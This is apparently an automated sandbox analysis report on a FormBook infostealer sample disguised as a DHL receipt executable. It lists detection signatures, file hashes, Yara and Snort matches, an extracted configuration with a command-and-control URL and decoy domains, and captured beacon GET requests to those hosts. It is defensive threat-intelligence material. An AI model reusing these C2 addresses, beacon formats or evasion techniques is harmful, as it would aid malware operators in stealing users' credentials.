Windows Analysis Report
DHL_29028263 receipt document of the purchase,pdf.exe

Overview

General Information

Sample Name: DHL_29028263 receipt document of the purchase,pdf.exe
Analysis ID: 635250
MD5: c97dfff9af3555ca25082cc686715c76
SHA1: efc71d34d01661436ef23e2af1a36f7f96319122
SHA256: bd89fe68b099ed00bea985dbdf7c8c0d87deb5a85c29d7a27f09764ab5b9d04d
Tags: DHLexeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.bestofsouthbeach.guide/mrw6/"], "decoy": ["car-kit.store", "localbrewsislamorada.com", "jaykamins.art", "babeswant.com", "tubularyhvlpu.online", "psychomindsofficial.com", "jmsls.net", "nxeifycssut.mobi", "paraquatinducedparkinsons.com", "trancendentalastroshop.store", "modaskayita.com", "reeventos.com", "loueofficial.com", "sentlogisticsja.com", "umiyan.com", "getvirtualaddress.com", "beargreasers.com", "kyousaku.net", "prospectdatasolutions.com", "16gjm.xyz", "range4tis.com", "doholiz.com", "techno-delights.com", "commercewholesale.com", "delcobilly.com", "artificial-pigment.wiki", "hashv.one", "weichuang-pifa.com", "cafehavanacigars.club", "misantaparticulares.online", "frontierwindpowerllc.com", "howellandassocinc.com", "cherylwoya.com", "platinumridge.art", "corporatesupplygroup.online", "blog-ikusachi-life.com", "946abg.net", "djfest.net", "haiye88.com", "koedayuuki.net", "jagapps.tech", "metanask.online", "southtm.com", "mcalpinindustries.com", "unifonic.agency", "quarhu.com", "jxrszp.com", "itasetembro-consulte.digital", "ff4cn15ck.xyz", "xd16880.com", "btcminers.bet", "laborchcg.com", "tanran.online", "shuddhiorganics.com", "numi.quest", "fortuscare.com", "fromleadertomastercoach.com", "xn--eltemplodehcate-lnb.com", "activeton.com", "morningvibecoffee.com", "uhk.academy", "finestrecitaltolearn-today.info", "citie-dct.com", "xn--xcr352cxsd.net"]}
Multi AV Scanner detection for submitted file
Source: DHL_29028263 receipt document of the purchase,pdf.exe ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.cherylwoya.com/mrw6/?5j=-Z8hhJu0CH1&kZL=6fZEMEdK0EUsHT8poDGbU1zs+0N96qjYHzalTR2tuqMjY7ixAH4WqcSwjImDfJQ+xirU Avira URL Cloud: Label: phishing
Source: http://www.946abg.net/mrw6/?kZL=serf4G2fT23AQqvD11FW0e5UhnaipW+P1SIFRHWKX7vOHQGiYIAk+83ijhEv+8S8z0gu&5j=-Z8hhJu0CH1 Avira URL Cloud: Label: malware
Source: www.bestofsouthbeach.guide/mrw6/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: cherylwoya.com Virustotal: Detection: 9% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.find.exe.400000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.2.find.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.0.find.exe.400000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.0.find.exe.400000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.0.find.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 0.2.DHL_29028263 receipt document of the purchase,pdf.exe.43b5118.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.486933021.0000000004396000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL_29028263 receipt document of the purchase,pdf.exe PID: 7020, type: MEMORYSTR
Uses 32bit PE files
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: find.pdb source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484850602.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705313981.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706967568.0000000003C37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: find.exe, 00000002.00000003.473865618.0000000003042000.00000004.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.572052995.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.573306968.00000000032FF000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000003.471487000.0000000000E8B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.569780070.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.573320075.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705917603.0000000003700000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706304767.000000000381F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: find.exe, find.exe, 00000002.00000003.473865618.0000000003042000.00000004.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.572052995.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000002.573306968.00000000032FF000.00000040.00000800.00020000.00000000.sdmp, find.exe, 00000002.00000003.471487000.0000000000E8B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000E.00000003.569780070.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.573320075.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705917603.0000000003700000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706304767.000000000381F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: find.pdbGCTL source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484850602.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.705313981.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.706967568.0000000003C37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: C:\agent\_work\4\s\obj\VS\Microsoft.WebTools.Languages.Json\Release\Microsoft.WebTools.Languages.Json.pdb source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.cherylwoya.com
Source: C:\Windows\explorer.exe Network Connect: 64.34.156.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.946abg.net
Source: C:\Windows\explorer.exe Domain query: www.kyousaku.net
Source: C:\Windows\explorer.exe Network Connect: 154.86.129.243 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49816 -> 209.99.64.43:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49816 -> 209.99.64.43:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49816 -> 209.99.64.43:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.bestofsouthbeach.guide/mrw6/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: COGECO-PEER1CA COGECO-PEER1CA
Source: Joe Sandbox View ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /mrw6/?5j=-Z8hhJu0CH1&kZL=6fZEMEdK0EUsHT8poDGbU1zs+0N96qjYHzalTR2tuqMjY7ixAH4WqcSwjImDfJQ+xirU HTTP/1.1Host: www.cherylwoya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mrw6/?kZL=serf4G2fT23AQqvD11FW0e5UhnaipW+P1SIFRHWKX7vOHQGiYIAk+83ijhEv+8S8z0gu&5j=-Z8hhJu0CH1 HTTP/1.1Host: www.946abg.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 154.86.129.243 154.86.129.243
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:53:01 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Transfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:53:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#Lhttp://json-schema.org/draft-04/schema
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.random.org/sequences/
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/arm-tools-apiversion.
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://schema.management.azure.com/schemas/2019-08-01/managementGroupDeploymentTemplate.json
Source: DHL_29028263 receipt document of the purchase,pdf.exe, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://schema.management.azure.com/schemas/2019-08-01/tenantDeploymentTemplate.json
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000000.435567902.00000000010E2000.00000020.00000001.01000000.00000003.sdmp, DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.479557672.00000000010E2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://schema.management.azure.com/schemas/2019-08-01/tenantDeploymentTemplate.json.2014
Source: unknown DNS traffic detected: queries for: www.cherylwoya.com
Source: global traffic HTTP traffic detected: GET /mrw6/?5j=-Z8hhJu0CH1&kZL=6fZEMEdK0EUsHT8poDGbU1zs+0N96qjYHzalTR2tuqMjY7ixAH4WqcSwjImDfJQ+xirU HTTP/1.1Host: www.cherylwoya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mrw6/?kZL=serf4G2fT23AQqvD11FW0e5UhnaipW+P1SIFRHWKX7vOHQGiYIAk+83ijhEv+8S8z0gu&5j=-Z8hhJu0CH1 HTTP/1.1Host: www.946abg.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.478889844.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.DHL_29028263 receipt document of the purchase,pdf.exe.43b5118.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.DHL_29028263 receipt document of the purchase,pdf.exe.43b5118.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
